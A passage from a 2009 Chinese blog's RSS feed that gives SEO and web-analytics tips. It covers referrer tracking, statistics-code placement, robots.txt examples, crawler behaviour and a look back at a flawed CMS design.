<p>今天遗憾地发现当当的配货速度实在不敢恭维，3号的订单到现在还在配货，此外貌似淘宝上图书价格比当当还便宜，可惜店家的书不知道会不会比当当全，下次决定尝试在淘宝上购书。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-14 22:06:49]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[访问统计程序释疑：自行输入网址的来路和自身域名的来路有何不同]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/zixingshuruwangzhidelailu5.html]]></link><description><![CDATA[<p>有一些朋友，包括我自己，以前对访问统计程序中的&ldquo;自行输入网址&rdquo;和自身域名的来路深感疑惑，例如对本站而言，&ldquo;自行输入网址&rdquo;和来路是&ldquo;http://www.001pp.com/&rdquo;的访问者有何不同？简单地说，&ldquo;自行输入网址&rdquo;的来路就是用户的浏览器在访问放置统计代码的页面之前，并没有访问其他的网站，例如，从收藏夹访问你的网站，从QQ聊天窗口点击连接访问，自己输入域名。而来路是自身域名的，则是用户的浏览器在访问放置统计代码的页面时候，用户还访问了你的首页。这里可能会有人感到困惑，既然用户在之前还访问了首页，那用户又是从什么来路访问首页的呢？</p>
<p>这个问题其实很好解释，统计程序中，显示来路是你自己域名的，例如本站，来路是&ldquo;http://www.001pp.com/&rdquo;的，他们之前的来路没办法被检测到，因为统计程序在他们访问&ldquo;http://www.001pp.com/&rdquo;的时候并没有正常工作，而他们从这个首页访问其他放置了统计代码的页面时，例如访问本站所在的页面（http://www.001pp.<font color="#000000">com</font>/chengxuyouhua/zixingshuruwangzhidelailu5.html），统计系统工作了，获得了来路就是首页了，因此你会在统计程序中，看到了来路是&ldquo;http://www.001pp.com/&rdquo;。</p>
<p>那为什么统计程序没有正常工作呢，可能有以下几种原因</p>
<p>1、统计程序自身出现故障，例如短暂的繁忙或者网络问题</p>
<p>2、你的代码放置有问题。这种情况出现得比较多，我们知道浏览器的页面的解析次序是按代码的先后顺序进行解析的，如果你网站的统计代码放在了页面的底部，那么可能用户没有等浏览器解析完页面，例如只打开一半页面，就点击你的站内连接跳转到了别出去，而这种情况下由于浏览器只解析了一半的页面，统计代码甚至可能还没被浏览器下载到，自然统计代码无法工作，另一种情况则出现于用JS形式调用统计代码的时候，绝大部分主流的统计程序都推荐这种方式，但是浏览器对JS的执行的次序，是按照SCRIPT块的先后顺序，逐一执行SCRIPT块内的JS代码，假如你的统计代码之前还有很多你自己的JS代码，或者站外的JS代码，那么必须等浏览器执行完这些代码以后，才会执行统计代码，这种情况下，一旦你自己的JS代码运行速度过慢，或者站外的JS代码（也许是另一个统计程序）出现网络问题，那么统计代码则无法被执行。</p>
<p>知道了原因，解决的办法就很明确了，优化你的页面布局，最简单的办法是将统计代码放到网站每个页面的最顶部而非最底部，但是缺陷是显而易见的，用户必须等统计代码加载执行完毕以后，才会看到页面的正文内容，假如统计代码出问题，那么对用户来说将有一个漫长的等待。更好的办法是使用IFRAME调用的方式调用统计代码，并将统计代码放到页面的靠前位置，因为IFRAME内的页面和父页面是同时打开的，不会像ＳＣＲＩＰＴ块一样，要一个ＳＣＲＩＰＴ块执行完毕才能执行下一个，万能百度的统计代码置放方式就是这一种。目前而言，５１.ｌａ就提供了IFRAME方式放置统计代码的功能</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-11 10:34:15]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[完成了万能百度1.0]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/wannengbaidu4.html]]></link><description><![CDATA[<p>万能百度1.0&hellip;&hellip;其实名字是个噱头，灵感来源于《亵渎》里的希洛之书，恐怕叫它竞争对手情况分析还恰当一点。&hellip;&hellip;主要增加了以下功能</p>
<p>在查询关键的时候，显示关键词的估计检索量，同时，对serp列出的页面，查询该页面的PR，链入数，百度的收录情况以及site是否在首页（30条结果一页）。虽然这只是开发某个工具顺手做的附属品，但是个人还是很喜欢，希望能尽量完善之。考虑是否加入关键词密度的查询以及META预览，不过以我懒惰的个性这应该是下个版本的事情了&hellip;&hellip;</p>
<blockquote>
<p>万能百度：<a href="http://www.wannengbaidu.com/">http://www.wannengbaidu.com/</a> 广告语：诸神亦非万能，而百度无所不能（能查google PR能查雅虎外链&hellip;&hellip;）</p>
</blockquote>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-11 10:04:37]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[robots.txt在搜索引擎优化中的妙用]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/robotstxt3.html]]></link><description><![CDATA[<p>可能一般人的观点是robots.txt可写可不写，写错了还有麻烦，所以干脆不写。其实，在搜索引擎优化中，robots.txt有这么几个妙用。</p>
<p>1、新站创建的时候引导蜘蛛抓取列表页。新站初建，在你的robots.txt写入网站的栏目地址以便抓取。示例如下</p>
<blockquote>
<p># <a href="http://www.001pp.com/">http://www.001pp.com/</a> 网站优化的robots.txt<br />
User-agent: *<br />
Allow: /chengxuyouhua/<br />
Allow: /wangzhananquan/<br />
Allow: /sousuoyinqingyouhua/<br />
Sitemap: /asp/rss.asp<br />
&nbsp;</p>
</blockquote>
<p>2、屏蔽低质量的页面收录。例如，你的一个网页是动态的页面，content.asp，通过参数id来获得不同的内容，而假如你需要增加一个参数style,以便给不同的用户显示不同样式，但是内容相同的页面，那么，对于id为1的同一个内容的页面，可能会出现好几个连接</p>
<blockquote>
<p>content.asp?id=1</p>
<p>content.asp?id=1&amp;style=red</p>
<p>content.asp?id=1&amp;style=green</p>
</blockquote>
<p>&nbsp;对于这些连接而言，内容相同，但是连接不同，就可能导致重复内容的出现，在此，你可以通过robots.txt屏蔽重复页面的收录，写法如下</p>
<blockquote>
<p>User-agent: *<br />
Disallow: content.asp?id=*&amp;style=*</p>
</blockquote>
<p>3、无须向各大搜索引擎提交sitemap直接标示sitemap 谷歌，微软以及雅虎均已经支持这一robots.txt的扩展写法，你可以无须向各大搜索引擎提交你的sitemap。示例同1.</p>
<p>至于robots.txt的具体写法，建议还是参照百度给出的指南，十分详细 http://www.baidu.com/search/robots.html</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-09 22:27:57]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[如何蜘蛛引导系统地抓取网站]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/zhizhuzhuaqu2.html]]></link><description><![CDATA[<p>假如你可以看到谷歌对新站抓取的日志，你会发现，对于大多数站点，谷歌的抓取都是极有规律的，只要你的模板不会太糟糕，它都会先抓取栏目页面，值得一提的是，像&ldquo;关于我们&rdquo;，&ldquo;联系我们&rdquo;这样的页面也是经常是第一批被抓取的对象，也就是说，谷歌能够读懂你的ＨＴＭＬ代码，能够大概地明白哪个DIV是导航，哪个DIV是文章列表，哪些链接可能是栏目页面，因此，一个符合语义化的XHTML代码能很好地引导谷歌的爬虫对你的网站进行抓取。</p>
<p>谷歌对于rss文件与sitemap也是较为偏爱的，特别是在你有提交谷歌管理员工具的时候，googlebot一般会先读取rss或者sitemap，而后根据列出的地址逐一进行抓取。因此，引导googlebot的抓取其实是很简单的事情，语义化的XHTML代码+XML网站地图。</p>
<p>反观百度&hellip;&hellip;令人愕然。。看上去是极为凌乱的抓取次序，它抓取的次序，即不是谷歌栏目页&mdash;内容页的顺序，也不是按照代码出现的次序进行抓取的，实在令人疑惑。这么一只调皮的spider，似乎无视你的页面代码，只根据自己的喜好进行抓取。</p>
<p>对于新站的rss甚至于百度自己开发的2种协议，新闻协议以及论坛收录协议，百度似乎都是不怎么理睬的德行，因此如果用谷歌的方法来引导蜘蛛抓取实在是比较困难。笔者目前尝试另一个办法，如果有做新站的可以试试，将你的站点结构写入robots，设置栏目页面为allow，例如，网站优化站的栏目结构分为 程序优化，搜索引擎优化，网站安全三个栏目，目录分别为&nbsp; /chengxuyouhua/ ，/wangzhananquan/ ，/sousuoyinqingyouhua/，则写成的robots.txt 如下</p>
<p># http://www.001pp.com/ 网站优化的robots.txt<br />
User-agent: *<br />
Allow: /chengxuyouhua/<br />
Allow: /wangzhananquan/<br />
Allow: /sousuoyinqingyouhua/<br />
&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-09 21:33:25]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[旧版的CMS基本上被证明是失败的]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/cms1.html]]></link><description><![CDATA[<p>曾经在去年年底，结合seo开发了一套自用的CMS，也就是旧版的001pp.com，现在看来，这套程序的模板在搜索引擎的表现是极其糟糕的。</p>
<p>首先，在错误的时间，使用了H系列代码，虽然是语义化的H系列。而且H1的使用也有过多之嫌。居然出现了搜索引擎优化中很容易犯的初级错误。</p>
<p>其次，TAG的抽取密度过高。我在集合TAG的时候，尝试借鉴搜索引擎的做法，将文中所有出现TAG的句子全部提取并高亮了出来。</p>
<p>第三，还是TAG，过于细分导致出现了过多的列表页面，反而降低了整站的权威性。</p>
<p>第四，内部链接重复出现的次数过多。早先没有想到如何让单一词汇的内部链接只出现一次。</p>
<p>第五，对相关文章的定义产生了错误的理解。用户所乐见的相关文章，未必是搜索引擎所乐见的相关文章。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-09 21:16:58]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item>

</channel>
</rss>

